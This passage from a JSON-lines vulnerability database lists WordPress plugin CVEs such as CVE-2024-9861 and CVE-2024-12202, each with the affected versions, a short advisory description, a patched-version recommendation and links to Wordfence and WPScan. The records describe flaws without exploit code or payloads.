5e4a7d8fa965?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10584","slug":"directorypress","versionImpact":"3.6.16","versionEndExcluding":"3.6.17","description":"The DirectoryPress \u2013 Business Directory And Classified Ad Listing plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 3.6.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. When DirectoryPress Frontend is installed, this can be exploited by unauthenticated users.","recommendation":"Update to version 3.6.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205071\\\/directorypress\\\/trunk\\\/includes\\\/directorypress_svg.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205071\\\/directorypress\\\/trunk\\\/includes\\\/directorypress_svg.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4625072b-815d-41d2-bf8f-ac290efde369?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4625072b-815d-41d2-bf8f-ac290efde369?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9863","slug":"miniorange-firebase-sms-otp-verification","versionImpact":"3.6.0","versionEndExcluding":"3.6.1","description":"The UserPro plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 3.6.0 due to the insecure 'administrator' default value for the 'default_user_role' option. This makes it possible for unauthenticated attackers to register an administrator user even if the registration form is disabled.","recommendation":"Update to version 3.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f04eab14-dd86-4145-b5eb-20d064bc8417?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f04eab14-dd86-4145-b5eb-20d064bc8417?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/miniorange-firebase-sms-otp-verification\\\/tags\\\/3.6.0\\\/handler\\\/forms\\\/class-registrationform.php#L194\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/miniorange-firebase-sms-otp-verification\\\/tags\\\/3.6.0\\\/handler\\\/forms\\\/class-registrationform.php#L194\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169869\\\/miniorange-firebase-sms-otp-verification#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169869\\\/miniorange-firebase-sms-otp-verification#file4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9862","slug":"miniorange-firebase-sms-otp-verification","versionImpact":"3.6.0","versionEndExcluding":"3.6.1","description":"The Miniorange OTP Verification with Firebase plugin for WordPress is vulnerable to Arbitrary User Password Change in versions up to, and including, 3.6.0. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources, and the user current password check is missing. This makes it possible for unauthenticated attackers to change user passwords and potentially take over administrator accounts.","recommendation":"Update to version 3.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c3df12d-e526-4a23-89d3-bfdcea9f7b2d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c3df12d-e526-4a23-89d3-bfdcea9f7b2d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/miniorange-firebase-sms-otp-verification\\\/tags\\\/3.6.0\\\/handler\\\/forms\\\/class-loginform.php#L236\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/miniorange-firebase-sms-otp-verification\\\/tags\\\/3.6.0\\\/handler\\\/forms\\\/class-loginform.php#L236\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169869\\\/miniorange-firebase-sms-otp-verification#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169869\\\/miniorange-firebase-sms-otp-verification#file3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9861","slug":"miniorange-firebase-sms-otp-verification","versionImpact":"3.6.0","versionEndExcluding":"3.6.1","description":"The Miniorange OTP Verification with Firebase plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.6.0. This is due to missing validation on the token being supplied during the otp login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the phone number associated with that user.","recommendation":"Update to version 3.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04045ec3-dd8e-4ac5-bd73-eef6205ecc62?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04045ec3-dd8e-4ac5-bd73-eef6205ecc62?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/miniorange-firebase-sms-otp-verification\\\/tags\\\/3.6.0\\\/handler\\\/forms\\\/class-loginform.php#L144\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/miniorange-firebase-sms-otp-verification\\\/tags\\\/3.6.0\\\/handler\\\/forms\\\/class-loginform.php#L144\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/miniorange-firebase-sms-otp-verification\\\/tags\\\/3.6.0\\\/handler\\\/forms\\\/class-loginform.php#L190\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/miniorange-firebase-sms-otp-verification\\\/tags\\\/3.6.0\\\/handler\\\/forms\\\/class-loginform.php#L190\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169869\\\/miniorange-firebase-sms-otp-verification#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169869\\\/miniorange-firebase-sms-otp-verification#file3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6261","slug":"final-tiles-grid-gallery-lite","versionImpact":"3.6.0","versionEndExcluding":"3.6.1","description":"The Image Photo Gallery Final Tiles Grid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'FinalTilesGallery' shortcode in all versions up to, and including, 3.6.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/final-tiles-grid-gallery-lite\\\/trunk\\\/lightbox\\\/lightbox2\\\/js\\\/script.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/final-tiles-grid-gallery-lite\\\/trunk\\\/lightbox\\\/lightbox2\\\/js\\\/script.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123808\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123808\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d945c4b-3eb1-4bab-b355-117b7fd06553?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d945c4b-3eb1-4bab-b355-117b7fd06553?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3500","slug":"elementskit","versionImpact":"3.6.0","versionEndExcluding":"3.6.1","description":"The ElementsKit Pro plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.6.0 via the Price Menu, Hotspot, and Advanced Toggle widgets. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 3.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8ae0a47-cba5-468e-8d25-7b7176373b9c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8ae0a47-cba5-468e-8d25-7b7176373b9c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/account.wpmet.com\\\/downloads\\\/elementskit\\\/?changelog=1\",\"name\":\"https:\\\/\\\/account.wpmet.com\\\/downloads\\\/elementskit\\\/?changelog=1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12202","slug":"croma-music","versionImpact":"3.6","versionEndExcluding":"3.6.1","description":"The Croma Music plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the 'ironMusic_ajax' function in all versions up to, and including, 3.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"Update to version 3.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/croma.irontemplates.com\\\/lowtempo\\\/wp-content\\\/themes\\\/croma\\\/changelog.txt\",\"name\":\"https:\\\/\\\/croma.irontemplates.com\\\/lowtempo\\\/wp-content\\\/themes\\\/croma\\\/changelog.txt\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ce8e0f1-5a7b-41a3-81d0-7fd12c9da6d9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ce8e0f1-5a7b-41a3-81d0-7fd12c9da6d9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1562","slug":"wp-marketing-automations","versionImpact":"3.5.3","versionEndExcluding":"3.6.0","description":"The Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation due to a missing capability check on the install_or_activate_addon_plugins() function and a weak nonce hash in all versions up to, and including, 3.5.3. This makes it possible for unauthenticated attackers to install arbitrary plugins on the site that can be leveraged to further infect a vulnerable site.","recommendation":"Update to version 3.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-marketing-automations\\\/tags\\\/2.5.0\\\/includes\\\/api\\\/plugin_status\\\/class-bwfan-api-install-and-activate-plugin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-marketing-automations\\\/tags\\\/2.5.0\\\/includes\\\/api\\\/plugin_status\\\/class-bwfan-api-install-and-activate-plugin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-marketing-automations\\\/tags\\\/2.5.0\\\/includes\\\/class-bwfan-db.php#L153\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-marketing-automations\\\/tags\\\/2.5.0\\\/includes\\\/class-bwfan-db.php#L153\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3305437\\\/wp-marketing-automations\\\/trunk\\\/admin\\\/class-bwfan-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3305437\\\/wp-marketing-automations\\\/trunk\\\/admin\\\/class-bwfan-admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3305437\\\/wp-marketing-automations\\\/trunk\\\/includes\\\/abstracts\\\/class-bwfan-api-base.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3305437\\\/wp-marketing-automations\\\/trunk\\\/includes\\\/abstracts\\\/class-bwfan-api-base.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3305437\\\/wp-marketing-automations\\\/trunk\\\/includes\\\/class-bwfan-api-loader.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3305437\\\/wp-marketing-automations\\\/trunk\\\/includes\\\/class-bwfan-api-loader.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/094972e6-7e02-4060-b069-e39c8cde9331?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/094972e6-7e02-4060-b069-e39c8cde9331?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11342","slug":"skt-nurcaptcha","versionImpact":"3.5.0","versionEndExcluding":"3.6.0","description":"The Skt NURCaptcha plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.5.0. This is due to missing or incorrect nonce validation in the skt-nurc-admin.php file. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/skt-nurcaptcha\\\/trunk\\\/skt-nurc-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/skt-nurcaptcha\\\/trunk\\\/skt-nurc-admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/skt-nurcaptcha\\\/trunk\\\/skt-nurc-admin.php?rev=3195583\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/skt-nurcaptcha\\\/trunk\\\/skt-nurc-admin.php?rev=3195583\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3195583%40skt-nurcaptcha&new=3195583%40skt-nurcaptcha&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3195583%40skt-nurcaptcha&new=3195583%40skt-nurcaptcha&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96e47918-7848-407a-8f77-dbbfeb17029d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96e47918-7848-407a-8f77-dbbfeb17029d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4664","slug":"logo-slider-wp","versionEndExcluding":"3.6.0","description":"The Logo Slider WordPress plugin before 3.6.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d6a9cfaa-d3fa-442e-a9a1-b06588723e39\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d6a9cfaa-d3fa-442e-a9a1-b06588723e39\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3710","slug":"final-tiles-grid-gallery-lite","versionImpact":"2.5.8","versionEndExcluding":"3.6.0","description":"The Image Photo Gallery Final Tiles Grid WordPress plugin before 3.6.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin","recommendation":"Update to version 3.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bde10913-4f7e-4590-86eb-33bfa904f95f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bde10913-4f7e-4590-86eb-33bfa904f95f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5448","slug":"wp-register-profile-with-shortcode","versionImpact":"3.5.9","versionEndExcluding":"3.6.0","description":"The WP Register Profile With Shortcode plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.5.9. This is due to missing or incorrect nonce validation on the update_password_validate function. This makes it possible for unauthenticated attackers to reset a user's password via a forged request granted they can trick the user into performing an action such as clicking on a link.","recommendation":"Update to version 3.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca564941-4780-4da2-b937-c9bd45966d81?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca564941-4780-4da2-b937-c9bd45966d81?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3018102\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3018102\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12624","slug":"sina-extension-for-elementor","versionImpact":"3.5.91","versionEndExcluding":"3.6.0","description":"The Sina Extension for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Sina Image Differ widget in all versions up to, and including, 3.5.91 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211218\\\/sina-extension-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211218\\\/sina-extension-for-elementor\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39f6fb61-25a9-4386-9b61-7343760fd28c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39f6fb61-25a9-4386-9b61-7343760fd28c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5465","slug":"popup-with-fancybox","versionImpact":"3.5","versionEndExcluding":"3.6","description":"The Popup with fancybox plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 3.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c943cf0b-0e99-4d47-808d-2b803369d53a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c943cf0b-0e99-4d47-808d-2b803369d53a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/popup-with-fancybox\\\/trunk\\\/popup-with-fancybox.php?rev=2827070#L110\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/popup-with-fancybox\\\/trunk\\\/popup-with-fancybox.php?rev=2827070#L110\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985560\\\/popup-with-fancybox#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985560\\\/popup-with-fancybox#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10545","slug":"nextgen-gallery","versionImpact":"3.59.8","versionEndExcluding":"3.59.9","description":"The Photo Gallery, Sliders, Proofing and   WordPress plugin before 3.59.9 does not sanitise and escape some of its Image settings, which could allow high privilege users such as Admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.59.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e969e5f8-17cb-489b-988d-cae31719da36\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e969e5f8-17cb-489b-988d-cae31719da36\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5442","slug":"nextgen-gallery","versionImpact":"3.59.2","versionEndExcluding":"3.59.3","description":"The Photo Gallery, Sliders, Proofing and   WordPress plugin before 3.59.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.59.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4f1fa417-f760-4132-95c2-a38d0b631263\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4f1fa417-f760-4132-95c2-a38d0b631263\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2744","slug":"nextgen-gallery","versionImpact":"3.59","versionEndExcluding":"3.59.1","description":"The NextGEN Gallery  WordPress plugin before 3.59.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 3.59.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a5579c15-50ba-4618-95e4-04b2033d721f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a5579c15-50ba-4618-95e4-04b2033d721f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4374","slug":"wp-automatic","versionEndExcluding":"3.53.3","description":"The WordPress Automatic Plugin for WordPress is vulnerable to arbitrary options updates in versions up to, and including, 3.53.2. This is due to missing authorization and option validation in the process_form.php file. This makes it possible for unauthenticated attackers to arbitrarily update the settings of a vulnerable site and ultimately compromise the entire site.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0567dc8-7a4c-42f4-bf45-f31a8efaa354?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0567dc8-7a4c-42f4-bf45-f31a8efaa354?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-vulnerability-fixed-in-wordpress-automatic-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-vulnerability-fixed-in-wordpress-automatic-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13883","slug":"wpupper-share-buttons","versionImpact":"3.51","versionEndExcluding":"3.52","description":"The WPUpper Share Buttons plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.51. This is due to missing or incorrect nonce validation on the 'save_custom_css_request' function. This makes it possible for unauthenticated attackers to inject custom CSS to modify a site via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.52, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpupper-share-buttons\\\/trunk\\\/Controller\\\/ajax.controller.php#L94\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpupper-share-buttons\\\/trunk\\\/Controller\\\/ajax.controller.php#L94\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ca55c87-6548-43b8-a23f-d31a51df9533?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ca55c87-6548-43b8-a23f-d31a51df9533?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9540","slug":"sina-extension-for-elementor","versionImpact":"3.5.7","versionEndExcluding":"3.5.8","description":"The Sina Extension for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.5.7 via the render function in widgets\/advanced\/sina-modal-box.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft Elementor template data.","recommendation":"Update to version 3.5.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab8659e1-5880-4738-99ed-e671449c6878?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab8659e1-5880-4738-99ed-e671449c6878?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167197\\\/sina-extension-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167197\\\/sina-extension-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4472","slug":"simple-sitemap","versionEndExcluding":"3.5.8","description":"The Simple Sitemap WordPress plugin before 3.5.8 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b685a12-2ca3-42dd-84fe-4a463a082c2a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b685a12-2ca3-42dd-84fe-4a463a082c2a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4023","slug":"3dprint","versionEndExcluding":"3.5.6.9","description":"The 3DPrint WordPress plugin before 3.5.6.9 does not protect against CSRF attacks in the modified version of Tiny File Manager included with the plugin, allowing an attacker to craft a malicious request that will create an archive of any files or directories on the target server by tricking a logged in admin into submitting a form. Furthermore the created archive has a predictable location and name, allowing the attacker to download the file if they know the time at which the form was submitted, making it possible to leak sensitive files like the WordPress configuration containing database credentials and secrets.","refs":"[{\"url\":\"https:\\\/\\\/jetpack.com\\\/blog\\\/vulnerabilities-found-in-the-3dprint-premium-plugin\\\/\",\"name\":\"https:\\\/\\\/jetpack.com\\\/blog\\\/vulnerabilities-found-in-the-3dprint-premium-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/859c6e7e-2381-4d93-a526-2000b4fb8fee\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/859c6e7e-2381-4d93-a526-2000b4fb8fee\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10792","slug":"wpfunnels","versionImpact":"3.5.5","versionEndExcluding":"3.5.6","description":"The Easiest Funnel Builder For WordPress & WooCommerce by WPFunnels plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'post_id' parameter in all versions up to, and including, 3.5.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This was partially patched in 3.5.4 and fully patched in 3.5.5.","recommendation":"Update to version 3.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpfunnels\\\/trunk\\\/includes\\\/core\\\/widgets\\\/oxygen\\\/elements\\\/optin\\\/template\\\/template-optin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpfunnels\\\/trunk\\\/includes\\\/core\\\/widgets\\\/oxygen\\\/elements\\\/optin\\\/template\\\/template-optin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3193046\\\/wpfunnels\\\/trunk\\\/includes\\\/core\\\/widgets\\\/oxygen\\\/elements\\\/optin\\\/template\\\/template-optin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3193046\\\/wpfunnels\\\/trunk\\\/includes\\\/core\\\/widgets\\\/oxygen\\\/elements\\\/optin\\\/template\\\/template-optin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3193046%40wpfunnels&new=3193046%40wpf